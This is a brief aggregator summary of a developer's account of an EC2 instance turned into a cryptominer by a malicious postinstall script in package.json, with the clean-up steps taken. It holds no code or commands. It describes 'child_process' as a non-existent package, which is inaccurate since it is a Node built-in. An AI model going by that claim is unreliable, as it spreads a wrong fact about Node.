How "Vibe Coding" Accidentally Turned My EC2 Instance Into a Cryptominer

A developer's EC2 instance was compromised due to a malicious postinstall script in their project's package.json file. The script, which used the non-existent 'child_process' package, ran silently with root permissions and turned the instance into a cryptominer. To fix the issue, the developer removed the malicious line from package.json, wiped the node_modules and lockfile, and rebuilt the container from scratch. This highlights the importance of secure coding practices and the need to monitor outbound traffic.

Source →
FeedLens — Signal over noise Last 7 days